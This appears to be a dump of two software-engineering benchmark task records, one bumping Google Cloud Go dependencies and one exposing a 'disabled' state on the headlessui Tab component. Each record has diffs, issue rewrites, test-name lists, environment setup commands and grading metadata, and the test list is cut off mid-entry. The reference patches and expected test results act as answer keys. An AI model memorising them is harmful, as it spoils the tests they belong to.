h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= @@ -586,8 +590,9 @@ google.golang.org/grpc v1.39.1/go.mod h1:PImNr+rS9TWYb2O4/emRugxiyHZ5JyHW5F+RPnD google.golang.org/grpc v1.40.0/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.40.1/go.mod h1:ogyxbiOoUXAkP+4+xa6PZSE9DZgIHtSpzjDTB9KAK34= google.golang.org/grpc v1.44.0/go.mod h1:k+4IHHFw41K8+bbowsex27ge2rCb65oeWqe4jJ590SU= -google.golang.org/grpc v1.45.0 h1:NEpgUqV3Z+ZjkqMsxMg11IaDrXY4RY6CQukSGK0uI1M= google.golang.org/grpc v1.45.0/go.mod h1:lN7owxKUQEqMfSyQikvvk5tf/6zMPsrK+ONuO11+0rQ= +google.golang.org/grpc v1.46.0 h1:oCjezcn6g6A75TGoKYBPgKmVBLexhYLM6MebdrPApP8= +google.golang.org/grpc v1.46.0/go.mod h1:vN9eftEi1UMyUsIF80+uQXhHjbXYbm0uXoFCACuMGWk= google.golang.org/grpc/cmd/protoc-gen-go-grpc v1.1.0/go.mod h1:6Kw0yEErY5E/yWrBtf03jp27GLLJujG4z/JK95pnjjw= google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0=
chore(all): bump storage to latest release
**Title** Update Cloud Storage client to the latest patch release across all modules **Problem** The repository was still using an older Cloud Storage client (v1.22.0). That version misses recent fixes and may cause compatibility or security issues for services that depend on it. **Root Cause** The go.mod files pinned the storage library to an outdated patch version, and transitive dependencies were not aligned with the newer storage release. **Fix / Expected Behavior** - Bump the Cloud Storage client to v1.22.1 in every module that depends on it. - Refresh go.mod and go.sum entries to reflect the new storage version and its transitive requirements. - Update related indirect dependencies (e.g., gRPC, genproto, UUID, xerrors) to versions compatible with the upgraded storage client. - Ensure the repository builds cleanly with the updated dependency graph. **Risk & Validation** - Run the full test suite for all services to confirm no compile‑time or run‑time regressions. - Verify that the updated storage client does not introduce breaking API changes by exercising common storage operations in integration tests. - Check that the go.mod/go.sum changes do not unintentionally upgrade unrelated dependencies.
6,069
googleapis/google-cloud-go
diff --git a/internal/godocfx/testdata/golden/index.yml b/internal/godocfx/testdata/golden/index.yml index 15e7ea3301..ccc6d95733 100644 --- a/internal/godocfx/testdata/golden/index.yml +++ b/internal/godocfx/testdata/golden/index.yml @@ -2491,6 +2491,9 @@ items: attribute is specified, the content type will be automatically sniffed using net/http.DetectContentType. + Note that each Writer allocates an internal buffer of size Writer.ChunkSize. + See the ChunkSize docs for more information. + It is the caller's responsibility to call Close when writing is done. To stop writing without saving the data, cancel the context. parent: cloud.google.com/go/storage.ObjectHandle @@ -3503,18 +3506,22 @@ items: ChunkSize controls the maximum number of bytes of the object that the\n\t// Writer will attempt to send to the server in a single request. Objects\n\t// smaller than the size will be sent in a single request, while larger\n\t// objects - will be split over multiple requests. The size will be rounded up\n\t// to the - nearest multiple of 256K.\n\t//\n\t// ChunkSize will default to a reasonable - value. If you perform many\n\t// concurrent writes of small objects (under ~8MB), - you may wish set ChunkSize\n\t// to a value that matches your objects' sizes - to avoid consuming large\n\t// amounts of memory. See\n\t// https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#size\n\t// + will be split over multiple requests. The value will be rounded up\n\t// to + the nearest multiple of 256K. The default ChunkSize is 16MiB.\n\t//\n\t// Each + Writer will internally allocate a buffer of size ChunkSize. This is\n\t// used + to buffer input data and allow for the input to be sent again if a\n\t// request + must be retried.\n\t//\n\t// If you upload small objects (< 16MiB), you should + set ChunkSize\n\t// to a value slightly larger than the objects' sizes to avoid + memory bloat.\n\t// This is especially important if you are uploading many small + objects\n\t// concurrently. See\n\t// https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#size\n\t// for more information about performance trade-offs related to ChunkSize.\n\t//\n\t// If ChunkSize is set to zero, chunking will be disabled and the object will\n\t// be uploaded in a single request without the use of a buffer. This will\n\t// further reduce memory used during uploads, but will also prevent the writer\n\t// - from retrying in case of a transient error from the server, since a buffer\n\t// - is required in order to retry the failed request.\n\t//\n\t// ChunkSize must - be set before the first Write call.\n\tChunkSize <a href=\"https://pkg.go.dev/builtin#int\">int</a>\n\n\t// + from retrying in case of a transient error from the server or resuming an\n\t// + upload that fails midway through, since the buffer is required in order to\n\t// + retry the failed request.\n\t//\n\t// ChunkSize must be set before the first + Write call.\n\tChunkSize <a href=\"https://pkg.go.dev/builtin#int\">int</a>\n\n\t// ChunkRetryDeadline sets a per-chunk retry deadline for multi-chunk\n\t// resumable uploads.\n\t//\n\t// For uploads of larger files, the Writer will attempt to retry if the\n\t// request to upload a particular chunk fails with a transient
[ "TestRetryableErrors", "TestCopy", "TestTables", "TestModels", "TestRoutines", "TestDatasets", "TestDatasetToBQ", "TestBQToDatasetMetadata", "TestDatasetMetadataToUpdateToBQ", "TestConvertAccessEntry", "TestDatasetIdentifiers", "TestPutMultiErrorString", "TestMultiErrorString", "TestErrorFromErrorProto", "TestErrorString", "TestExternalDataConfig", "TestQuote", "TestQualifier", "TestExtract", "TestExtractModel", "TestFileConfigPopulateLoadConfig", "TestFileConfigPopulateExternalDataConfig", "TestPolicyConversions", "TestNewInsertRequest", "TestNewInsertRequestErrors", "TestHandleInsertErrors", "TestValueSavers", "TestValueSaversErrors", "TestParseInterval", "TestCanonicalInterval", "TestIntervalDuration", "TestRowIteratorCacheBehavior", "TestIterator", "TestNextDuringErrorState", "TestNextAfterFinished", "TestIteratorNextTypes", "TestIteratorSourceJob", "TestCreateJobRef", "TestLoad", "TestBQToModelMetadata", "TestModelMetadataUpdateToBQ", "TestModelIdentifiers", "TestNullsJSON", "TestNullFloat64JSON", "TestNullFloat64JSON/float_value", "TestNullFloat64JSON/minus_infinity", "TestNullFloat64JSON/short_infinity", "TestNullFloat64JSON/positive_short_infinity", "TestNullFloat64JSON/long_infinity", "TestNullFloat64JSON/null", "TestNullFloat64JSON/minus_short_infinity", "TestNullFloat64JSON/NaN", "TestParamValueScalar", "TestParamValueArray", "TestParamValueStruct", "TestParamValueErrors", "TestParamType", "TestParamTypeErrors", "TestConvertParamValue", "TestQueryParameter_toBQ", "TestQuery", "TestProbeFastPath", "TestConfiguringQuery", "TestQueryLegacySQL", "TestRead", "TestNoMoreValues", "TestReadError", "TestReadTabledataOptions", "TestReadQueryOptions", "TestRoutineTypeConversions", "TestRoutineTypeConversions/ToRoutineMetadata/empty", "TestRoutineTypeConversions/ToRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/null_fields", "TestRoutineTypeConversions/FromRoutineMetadataToUpdate/body_and_libs", "TestRoutineTypeConversions/ToRoutineMetadata/basic", "TestRoutineTypeConversions/ToRoutineArgument/basic", "TestRoutineTypeConversions/FromRoutineArgument/empty", "TestRoutineTypeConversions/FromRoutineArgument/basic", "TestRoutineIdentifiers", "TestRelaxSchema", "TestSchemaConversion", "TestSimpleInference", "TestNestedInference", "TestRepeatedInference", "TestNullInference", "TestEmbeddedInference", "TestRecursiveInference", "TestTagInference", "TestTagInferenceErrors", "TestSchemaErrors", "TestHasRecursiveType", "TestSchemaFromJSON", "TestSchemaToJSONFields", "TestBQToStandardSQLDataType", "TestBQToStandardSQLField", "TestBQToStandardSQLStructType", "TestBQToTableMetadata", "TestTableMetadataToBQ", "TestTableMetadataToUpdateToBQ", "TestTableMetadataToUpdateToBQErrors", "TestTableIdentifiers", "TestConvertBasicValues", "TestConvertTime", "TestConvertSmallTimes", "TestConvertTimePrecision", "TestConvertTimePrecision/1555593697.154358", "TestConvertTimePrecision/1555593697.154359", "TestConvertTimePrecision/1555593697.154360", "TestConvertNullValues", "TestBasicRepetition", "TestNestedRecordContainingRepetition", "TestRepeatedRecordContainingRepetition", "TestRepeatedRecordContainingRecord", "TestConvertRowErrors", "TestValuesSaverConvertsToMap", "TestValuesToMapErrors", "TestStructSaver", "TestStructSaverErrors", "TestNumericStrings", "TestConvertRows", "TestValueList", "TestValueMap", "TestStructLoader", "TestStructLoaderRepeated", "TestStructLoaderNullable", "TestStructLoaderOverflow", "TestStructLoaderFieldOverlap", "TestStructLoaderErrors", "ExampleInferSchema", "ExampleInferSchema_tags" ]
[]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update", "apt-get install -y -qq golang", "export GOPATH=/root/go", "export GOMODCACHE=$GOPATH/pkg/mod", "export GOCACHE=/root/.cache/go-build", "export XDG_CACHE_HOME=/root/.cache", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "cd /google-cloud-go", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "cd /google-cloud-go/bigquery && go test -v ." }
{ "num_modified_files": 10, "num_modified_lines": 40, "pr_author": "codyoss", "pr_labels": [ "size: m: Pull request size is medium." ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue simply requests bumping the cloud.google.com/go/storage dependency to its latest release, which is clearly stated and matches the version updates in the provided patches. The test changes adjust generated documentation to reflect the new storage version and related ChunkSize details, aligning with the bump request. No mismatch or hidden requirements are present, and there are no signals of B‑category problems. Therefore the task is solvable (A) and represents a straightforward dev‑ops enhancement.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b83b5b6ffc66954a87ef9f1a1767b58f496618d8
2024-01-09 14:40:15
vercel[bot]: [vc]: #m5JwGxZRy1nv50m24FNcA4QtovnHyuXS1s/0r9qhD/s=:eyJpc01vbm9yZXBvIjp0cnVlLCJ0eXBlIjoiZ2l0aHViIiwicHJvamVjdHMiOlt7Im5hbWUiOiJoZWFkbGVzc3VpLXJlYWN0Iiwicm9vdERpcmVjdG9yeSI6InBsYXlncm91bmRzL3JlYWN0IiwiaW5zcGVjdG9yVXJsIjoiaHR0cHM6Ly92ZXJjZWwuY29tL3RhaWx3aW5kbGFicy9oZWFkbGVzc3VpLXJlYWN0LzNQZ2o1R0tzWVphUlY3d1pydm9iZUZwRTdXVloiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS1yZWFjdC1naXQtZml4LWlzc3VlLTI4NjQtdGFpbHdpbmRsYWJzLnZlcmNlbC5hcHAiLCJuZXh0Q29tbWl0U3RhdHVzIjoiUEVORElORyIsImxpdmVGZWVkYmFjayI6eyJyZXNvbHZlZCI6MCwidW5yZXNvbHZlZCI6MCwidG90YWwiOjAsImxpbmsiOiJoZWFkbGVzc3VpLXJlYWN0LWdpdC1maXgtaXNzdWUtMjg2NC10YWlsd2luZGxhYnMudmVyY2VsLmFwcCJ9fSx7Im5hbWUiOiJoZWFkbGVzc3VpLXZ1ZSIsInJvb3REaXJlY3RvcnkiOiJwbGF5Z3JvdW5kcy92dWUiLCJpbnNwZWN0b3JVcmwiOiJodHRwczovL3ZlcmNlbC5jb20vdGFpbHdpbmRsYWJzL2hlYWRsZXNzdWktdnVlLzRBUHBuRVhnVTZtV2tvZW1QYWRyU0NZcENtMlAiLCJwcmV2aWV3VXJsIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yODY0LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIiwibmV4dENvbW1pdFN0YXR1cyI6IlBFTkRJTkciLCJsaXZlRmVlZGJhY2siOnsicmVzb2x2ZWQiOjAsInVucmVzb2x2ZWQiOjAsInRvdGFsIjowLCJsaW5rIjoiaGVhZGxlc3N1aS12dWUtZ2l0LWZpeC1pc3N1ZS0yODY0LXRhaWx3aW5kbGFicy52ZXJjZWwuYXBwIn19XX0= **The latest updates on your projects**. Learn more about [Vercel for Git ↗︎](https://vercel.link/github-learn-more) | Name | Status | Preview | Comments | Updated (UTC) | | :--- | :----- | :------ | :------- | :------ | | **headlessui-react** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-react/3Pgj5GKsYZaRV7wZrvobeFpE7WVZ)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-react-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Jan 9, 2024 2:40pm | | **headlessui-vue** | 🔄 Building ([Inspect](https://vercel.com/tailwindlabs/headlessui-vue/4APpnEXgU6mWkoemPadrSCYpCm2P)) | [Visit Preview](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-visit-preview-link&passThrough=1) | 💬 [**Add feedback**](https://vercel.live/open-feedback/headlessui-vue-git-fix-issue-2864-tailwindlabs.vercel.app?via=pr-comment-feedback-link) | Jan 9, 2024 2:40pm |
tailwindlabs__headlessui-2918
diff --git a/packages/@headlessui-react/CHANGELOG.md b/packages/@headlessui-react/CHANGELOG.md index faa061e..1b7359e 100644 --- a/packages/@headlessui-react/CHANGELOG.md +++ b/packages/@headlessui-react/CHANGELOG.md @@ -7,7 +7,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -- Nothing yet! +### Fixed + +- Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) ## [2.0.0-alpha.4] - 2024-01-03 diff --git a/packages/@headlessui-react/src/components/tabs/tabs.tsx b/packages/@headlessui-react/src/components/tabs/tabs.tsx index 24ea498..e4de17f 100644 --- a/packages/@headlessui-react/src/components/tabs/tabs.tsx +++ b/packages/@headlessui-react/src/components/tabs/tabs.tsx @@ -388,6 +388,7 @@ type TabRenderPropArg = { active: boolean autofocus: boolean selected: boolean + disabled: boolean } type TabPropsWeControl = 'aria-controls' | 'aria-selected' | 'role' | 'tabIndex' @@ -512,8 +513,9 @@ function TabFn<TTag extends ElementType = typeof DEFAULT_TAB_TAG>( active, focus, autofocus: props.autoFocus ?? false, + disabled: props.disabled ?? false, }) satisfies TabRenderPropArg, - [selected, hover, focus, active, props.autoFocus] + [selected, hover, focus, active, props.autoFocus, props.disabled] ) let ourProps = mergeProps( diff --git a/packages/@headlessui-vue/CHANGELOG.md b/packages/@headlessui-vue/CHANGELOG.md index a372c35..5ac8cff 100644 --- a/packages/@headlessui-vue/CHANGELOG.md +++ b/packages/@headlessui-vue/CHANGELOG.md @@ -12,6 +12,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 - Add `immediate` prop to `<Combobox />` for immediately opening the Combobox when the `input` receives focus ([#2686](https://github.com/tailwindlabs/headlessui/pull/2686)) - Add `virtual` prop to `Combobox` component ([#2779](https://github.com/tailwindlabs/headlessui/pull/2779)) +### Fixed + +- Expose `disabled` state on `<Tab />` component ([#2918](https://github.com/tailwindlabs/headlessui/pull/2918)) + ## [1.7.17] - 2024-01-08 ### Fixed diff --git a/packages/@headlessui-vue/src/components/tabs/tabs.ts b/packages/@headlessui-vue/src/components/tabs/tabs.ts index 4e5156e..591c92c 100644 --- a/packages/@headlessui-vue/src/components/tabs/tabs.ts +++ b/packages/@headlessui-vue/src/components/tabs/tabs.ts @@ -423,7 +423,7 @@ export let Tab = defineComponent({ ) return () => { - let slot = { selected: selected.value } + let slot = { selected: selected.value, disabled: props.disabled ?? false } let { id, ...theirProps } = props let ourProps = { ref: internalTabRef,
Expose `disabled` state on `<Tab />` component This PR fixes an issue where `disabled` on the `<Tab/>` component wasn't exposed. This will expose it such that you can use it with `ui-disabled`. In the Alpha version of React, you can also use `data-[disabled]` because it will be exposed as `data-disabled` over there as well. Marked it as fixed because we already accept the `disabled` state and expose it in some other components so considered it "missing". Fixes: #2864
**Title** Expose the `disabled` state on the `<Tab />` component **Problem** The `<Tab />` component never surfaced its `disabled` prop, so utilities like `ui-disabled` or data attributes could not react to a disabled tab. This caused inconsistencies compared to other components that already expose this state. **Root Cause** The component’s render contract omitted the `disabled` flag, so it was never passed through to the consumer‑visible props. **Fix / Expected Behavior** - The `disabled` flag is now part of the render payload for `<Tab />`. - Consumers can style or query a disabled tab via Tailwind UI utilities or `data-[disabled]`. - The default value remains `false` when the prop is not supplied. - The change is reflected in both React and Vue implementations. - Documentation and changelog entries are updated to note the fix. **Risk & Validation** - Verify that existing tabs without a `disabled` prop continue to behave unchanged. - Add tests or visual checks confirming that a disabled tab receives the expected attributes and styling. - Ensure that the new render payload does not break type expectations for downstream consumers.
2,918
tailwindlabs/headlessui
diff --git a/packages/@headlessui-react/src/components/tabs/tabs.test.tsx b/packages/@headlessui-react/src/components/tabs/tabs.test.tsx index 679a4cb..9cb78f2 100644 --- a/packages/@headlessui-react/src/components/tabs/tabs.test.tsx +++ b/packages/@headlessui-react/src/components/tabs/tabs.test.tsx @@ -544,6 +544,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( @@ -553,6 +554,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( @@ -562,6 +564,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) @@ -574,6 +577,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( @@ -583,6 +587,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( @@ -592,6 +597,7 @@ describe('Rendering', () => { active: false, focus: false, autofocus: false, + disabled: false, }) ) }) diff --git a/packages/@headlessui-vue/src/components/tabs/tabs.test.ts b/packages/@headlessui-vue/src/components/tabs/tabs.test.ts index 96a152e..28a5896 100644 --- a/packages/@headlessui-vue/src/components/tabs/tabs.test.ts +++ b/packages/@headlessui-vue/src/components/tabs/tabs.test.ts @@ -463,25 +463,25 @@ describe('Rendering', () => { await new Promise<void>(nextTick) expect(document.querySelector('[data-tab="0"]')).toHaveTextContent( - JSON.stringify({ selected: true }) + JSON.stringify({ selected: true, disabled: false }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) await click(getTabs()[1]) expect(document.querySelector('[data-tab="0"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) expect(document.querySelector('[data-tab="1"]')).toHaveTextContent( - JSON.stringify({ selected: true }) + JSON.stringify({ selected: true, disabled: false }) ) expect(document.querySelector('[data-tab="2"]')).toHaveTextContent( - JSON.stringify({ selected: false }) + JSON.stringify({ selected: false, disabled: false }) ) })
[ "should keep the delay time into account", "should expose the `selected` state on the `Tab` components", "should transition in completely (duration defined in milliseconds)", "should fire events for all the stages" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should expose the correct components", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to transition", "should be possible to cancel a transition at any time", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", "should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should be possible to inert an element", "should not mark an element as inert when the hook is disabled", "should mark the element as not inert anymore, once all references are gone", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should render a `Field` component", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", "should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should reset the control when the form is reset", "should not be possible to programmatically escape the focus trap", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to use in an uncontrolled way", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should be possible to reset to the default value if the form is reset (using objects)", "should still call the onChange listeners when choosing new values", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp key", "should go to the next item when pressing the ArrowRight key", "should go to 